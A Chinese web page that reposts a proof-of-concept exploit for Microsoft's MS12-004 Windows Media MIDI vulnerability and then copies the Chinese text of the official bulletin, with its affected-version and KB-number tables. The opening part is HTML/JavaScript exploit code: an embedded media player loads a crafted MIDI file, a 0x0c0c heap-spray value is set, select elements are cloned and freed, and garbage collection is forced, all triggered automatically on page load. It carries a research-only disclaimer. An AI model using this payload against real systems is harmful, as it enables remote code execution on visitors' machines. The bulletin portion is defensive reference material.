MS12-004:說明 Windows XP Media Center Edition 2005 的 Windows 多媒體程式庫安全性更新:2012 年 1 月 10 日
MS12-004 EXP poc
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
- // http://sebug.net/paper/Exploits-Archives/2012-exploits/1201-exploits/MS12-004_poc.zip
- <object id="midi1" classid="clsid:22d6f312-b0f6-11d0-94ab-0080c74c7e95" codebase="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#version=5,1,52,701" standby="loading microsoft windows media player components..." type="application/x-oleobject" width="320" height="310">
- <param name="filename" value="./toto.mid">
- <param name="animationatstart" value="true">
- <param name="transparentatstart" value="true">
- <param name="autostart" value="false">
- <param name="showcontrols" value="true">
- <param name="ShowStatusBar" value="true">
- <param name="windowlessvideo" value="true">
- <embed src="./toto.mid" autostart="true" showcontrols="true" showstatusbar="1" bgcolor="white" width="320" height="310">
- </object>
- <script>
- var cloned = new Array();
- var numCloned = 50;
- function bang()
- {
- for (var i = 0; i < numCloned; i ++)
- {
- if ( cloned[i] != null )
- {
- var s = cloned[i].w0.toString();
- //alert(s);
- }
- }
- }
- function exploit()
- {
- var selob = document.createElement("select");
- selob.w0 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c");
- selob.w1 = this;
- selob.w2 = new Array();
- selob.w3 = true;
- selob.w4 = 0x41424344;
- selob.w5 = document.createElement("marquee");
- selob.w6 = undefined;
- selob.w7 = null;
- selob.w8 = alert;
- selob.w9 = RegExp.$1;
- selob.w10 = Infinity;
- selob.w11 = NaN;
- selob.w12 = new Date();
- for (var i = 12; i < 60; i ++)
- {
- selob["w"+i.toString()] = 0x41424344;
- }
- for (var i = 0; i < numCloned; i ++)
- {
- cloned[i] = selob.cloneNode(true);
- }
- for (var i = 1; i < numCloned; i += 7)
- {
- cloned[i] = null;
- }
- CollectGarbage();
- midi1.play();
- setTimeout(function(){bang();}, 5000);
- }
- setTimeout(function(){exploit();}, 3000);
- </script>
Microsoft 安全公告 MS12-004 - 严重
Windows Media 中的漏洞可能允许远程执行代码 (2636391)
发布时间: 2012年1月10日 | 更新时间: 2012年1月27日
版本: 1.2
一般信息
摘要
此安全更新可解决 Microsoft Windows 中两个秘密报告的漏洞。如果用户打开特制的媒体文件,这些漏洞可能允许远程执行代码。成功利用这些漏洞的攻击者可以获得与本地用户相同的用户权限。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
对于 Windows XP、Windows Server 2003、Windows Vista 和 Windows Server 2008 的所有受支持版本,此安全更新的等级为“严重”;对于 Windows Vista 和 Windows 7 的 Windows Media Center TV Pack 以及 Windows Server 2008 R2 的所有受支持版本,此安全更新的等级为“重要”。有关详细信息,请参阅本节中“受影响和不受影响的软件”小节。
此安全更新可通过更正 Windows Media Player 处理特制 MIDI 文件以及 DirectShow 分析媒体文件的方式来解决这些漏洞。有关这些漏洞的详细信息,请参阅下一节“漏洞信息”下面特定漏洞条目的“常见问题 (FAQ)”小节。
建议。 大多数客户均启用了“自动更新”,他们不必采取任何操作,因为此安全更新将自动下载并安装。尚未启用“自动更新”的客户必须检查更新,并手动安装此更新。有关自动更新中特定配置选项的信息,请参阅 Microsoft 知识库文章 294871。
对于管理员、企业安装或者想要手动安装此安全更新的最终用户,Microsoft 建议客户使用更新管理软件立即应用此更新或者利用 Microsoft Update 服务检查更新。
另请参阅本公告后面部分中的“检测和部署工具及指导”一节。
已知问题。 无
Top of section受影响和不受影响的软件
已对下列软件进行测试,以确定受到影响的版本。其他版本的支持生命周期已结束或者不受影响。要确定软件版本的技术支持生命周期,请访问 Microsoft 技术支持生命周期。
受影响的软件
| 操作系统 | 组件 | 最大安全影响 | 综合严重等级 | 此更新替代的公告 |
|---|---|---|---|---|
| Windows XP | ||||
| Windows XP Service Pack 3 | Windows 多媒体库 (KB2598479) DirectShow (KB2631813) |
远程执行代码 | 严重 | 没有公告由 KB2598479 替代 MS10-033 中的 KB975562 由 KB2631813 替代 |
| Windows XP Media Center Edition 2005 Service Pack 3 | Windows 多媒体库 (KB2628259) DirectShow[1] (KB2631813) |
远程执行代码 | 严重 | 没有公告由 KB2628259 替代 没有公告由 KB2631813 替代 |
| Windows XP Professional x64 Edition Service Pack 2 | Windows 多媒体库 (KB2598479) DirectShow (KB2631813) |
远程执行代码 | 严重 | 没有公告由 KB2598479 替代 MS10-033 中的 KB975562 由 KB2631813 替代 |
| Windows Server 2003 | ||||
| Windows Server 2003 Service Pack 2 | Windows 多媒体库 (KB2598479) DirectShow (KB2631813) |
远程执行代码 | 严重 | 没有公告由 KB2598479 替代 MS10-033 中的 KB975562 由 KB2631813 替代 |
| Windows Server 2003 x64 Edition Service Pack 2 | Windows 多媒体库 (KB2598479) DirectShow (KB2631813) |
远程执行代码 | 严重 | 没有公告由 KB2598479 替代 MS10-033 中的 KB975562 由 KB2631813 替代 |
| Windows Server 2003 SP2(用于基于 Itanium 的系统) | Windows 多媒体库 (KB2598479) DirectShow (KB2631813) |
远程执行代码 | 严重 | 没有公告由 KB2598479 替代 MS10-033 中的 KB975562 由 KB2631813 替代 |
| Windows Vista | ||||
| Windows Vista Service Pack 2 | Windows 多媒体库 (KB2598479) DirectShow (KB2631813) |
远程执行代码 | 严重 | 没有公告由 KB2598479 替代 没有公告由 KB2631813 替代 |
| Windows Vista x64 Edition Service Pack 2 | Windows 多媒体库 (KB2598479) DirectShow (KB2631813) |
远程执行代码 | 严重 | 没有公告由 KB2598479 替代 没有公告由 KB2631813 替代 |
| Windows Server 2008 | ||||
| Windows Server 2008(用于 32 位系统)Service Pack 2 | Windows 多媒体库* (KB2598479) DirectShow** (KB2631813) |
远程执行代码 | 严重 | 没有公告由 KB2598479 替代 没有公告由 KB2631813 替代 |
| Windows Server 2008(用于基于 x64 的系统)Service Pack 2 | Windows 多媒体库* (KB2598479) DirectShow** (KB2631813) |
远程执行代码 | 严重 | 没有公告由 KB2598479 替代 没有公告由 KB2631813 替代 |
| Windows Server 2008(用于基于 Itanium 的系统)Service Pack 2 | Windows 多媒体库 (KB2598479) DirectShow (KB2631813) |
远程执行代码 | 严重 | 没有公告由 KB2598479 替代 没有公告由 KB2631813 替代 |
| Windows 7 | ||||
| Windows 7(用于 32 位系统)和 Windows 7(用于 32 位系统)Service Pack 1 | DirectShow (KB2631813) |
远程执行代码 | 重要 | 没有公告由 KB2631813 替代 |
| Windows 7(用于基于 x64 的系统)和 Windows 7(用于基于 x64 的系统)Service Pack 1 | DirectShow (KB2631813) |
远程执行代码 | 重要 | 没有公告由 KB2631813 替代 |
| Windows Server 2008 R2 | ||||
| Windows Server 2008 R2(用于基于 x64 的系统)和 Windows Server 2008 R2(用于基于 x64 的系统)Service Pack 1 | DirectShow** (KB2631813) |
远程执行代码 | 重要 | 没有公告由 KB2631813 替代 |
| Windows Server 2008 R2(用于基于 Itanium 的系统)和 Windows Server 2008 R2(用于基于 Itanium 的系统)Service Pack 1 | DirectShow (KB2631813) |
远程执行代码 | 重要 | 没有公告由 KB2631813 替代 |
*服务器核心安装受到影响。此更新适用于 Windows Server 2008 或 Windows Server 2008 R2 的受支持版本,严重等级相同,无论是否使用“服务器核心”安装选项进行了安装。有关此安装选项的详细信息,请参阅 TechNet 文章管理服务器核心安装和服务服务器核心安装。注意,服务器核心安装选项不适用于 Windows Server 2008 和 Windows Server 2008 R2 的某些版本;请参阅比较服务器核心安装选项。
**服务器核心安装不受影响。如果使用服务器核心安装选项安装如上所述的 Windows Server 2008 或 Windows Server 2008 R2,则此更新所解决的漏洞不会影响其的受支持版本。有关此安装选项的详细信息,请参阅 TechNet 文章管理服务器核心安装和服务服务器核心安装。注意,服务器核心安装选项不适用于 Windows Server 2008 和 Windows Server 2008 R2 的某些版本;请参阅比较服务器核心安装选项。
[1]此更新与 Windows XP Service Pack 3 (KB2631813) 的 DirectShow 更新相同。
受影响的软件
| 其他软件 | 最大安全影响 | 综合严重等级 | 此更新替代的公告 |
|---|---|---|---|
| Windows Vista 的 Windows Media Center TV Pack(32 位版本)[2] (KB2628642) |
远程执行代码 | 重要 | 无 |
| Windows Vista 的 Windows Media Center TV Pack(64 位版本)[2] (KB2628642) |
远程执行代码 | 重要 | 无 |
[2]Windows Vista 的 Windows Media Center TV Pack 作为可选组件,仅在 Windows Vista 的 Home Premium 和 Ultimate 版本的原始设备制造商 (OEM) 安装中可用。安装了此可选组件的客户应安装其 Windows Vista 版本适用的所有更新。为保持最佳做法,Microsoft 建议首先安装操作系统更新 (KB2598479 和 KB2631813),然后再安装 Windows Media Center TV Pack 更新 (KB2628642)。
不受影响的软件
| 操作系统 | 组件 |
|---|---|
| Windows 7(用于 32 位系统)和 Windows 7(用于 32 位系统)Service Pack 1 | Windows 多媒体库 |
| Windows 7(用于基于 x64 的系统)和 Windows 7(用于基于 x64 的系统)Service Pack 1 | Windows 多媒体库 |
| Windows Server 2008 R2(用于基于 x64 的系统)和 Windows Server 2008 R2(用于基于 x64 的系统)Service Pack 1 | Windows 多媒体库 |
| Windows Server 2008 R2(用于基于 Itanium 的系统)和 Windows Server 2008 R2(用于基于 Itanium 的系统)Service Pack 1 |
QQ:147399120
QQ:147399120
QQ:147399120
E-Mail:lostlove000@163.com 电话:138-9741-0341 © Copyright( 2008-2012) Web.QhWins.Com All Rights Reserved 西宁威势电子信息服务有限公司(威势网络)版权所有,未经书面制授权,请勿随意转载!